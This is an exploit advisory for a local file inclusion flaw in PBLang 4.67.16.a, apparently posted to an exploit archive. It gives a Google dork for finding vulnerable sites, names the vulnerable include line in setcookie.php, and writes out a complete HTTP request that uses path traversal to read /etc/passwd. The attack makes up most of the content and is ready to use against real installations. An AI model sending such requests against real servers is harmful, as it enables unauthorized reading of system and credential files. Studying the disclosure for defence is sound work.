35 lines
No EOL
1.8 KiB
Text
35 lines
No EOL
1.8 KiB
Text
||\\ || || || |-\\ //-| ____ ________ __________
|
|
|| \\ || || || | |\\ //| | | \ | ______| |_______/ /
|
|
|| \\ || || || | | \\ // | | | _ \ | | / /
|
|
|| \\ || || || | | \\ // | | | |_) | | |______ /\`'__\ / /
|
|
|| \\ || || || | | \\ // | | | _ < | ______| \ \ \/ / /
|
|
|| \\ || ||_______|| | | \\// | | | |_) | | |______ \ \_\ / /
|
|
|| \\|| |_________| |_| |_| |_____/ |________| \/_/ /_/
|
|
______________________________________________________________________________________
|
|
# Exploit Title: [PBLang local file include vulnerability]
|
|
# Google Dork: ["Software PBLang 4.67.16.a"]
|
|
# Date: [12/03/2012]
|
|
# Author: ~Pseudo: [Number 7];
|
|
~ Twitter:[@TunisianSeven];
|
|
~ Blog: [http://tunisianseven.blogspot.com/]
|
|
# Software Link: [http://garr.dl.sourceforge.net/project/pblang/Full%20versions/PBLang%204.67.16.a%20no%20graphics/PBLang-4.67.16.a-nographics.zip]
|
|
# Version: [4.67.16.a]
|
|
# Tested on: [wINDOWS,Linux]
|
|
______________________________________________________________________________________
|
|
Proof of concept:
|
|
In setcookie.php
|
|
include($dbpath."/members/".$u);
|
|
|
|
In order to successfully perform this attack the attacker must have
|
|
the full path where the files are uploaded, and it is easy to get
|
|
making a request like this:
|
|
|
|
GET http://localhost/path/setcookie.php?u=../../../../../etc/passwd HTTP/1.1
|
|
Cookie: eXtplorer=eRlQPZSWiGt2zRpFlXr6qCgja6DiLumU
|
|
Host: localhost:80
|
|
Connection: Keep-alive
|
|
Accept-Encoding: gzip,deflate
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
|
|
|
|
For requests like this i use acunetix :D
|
|
______________________________________________________________________________________ |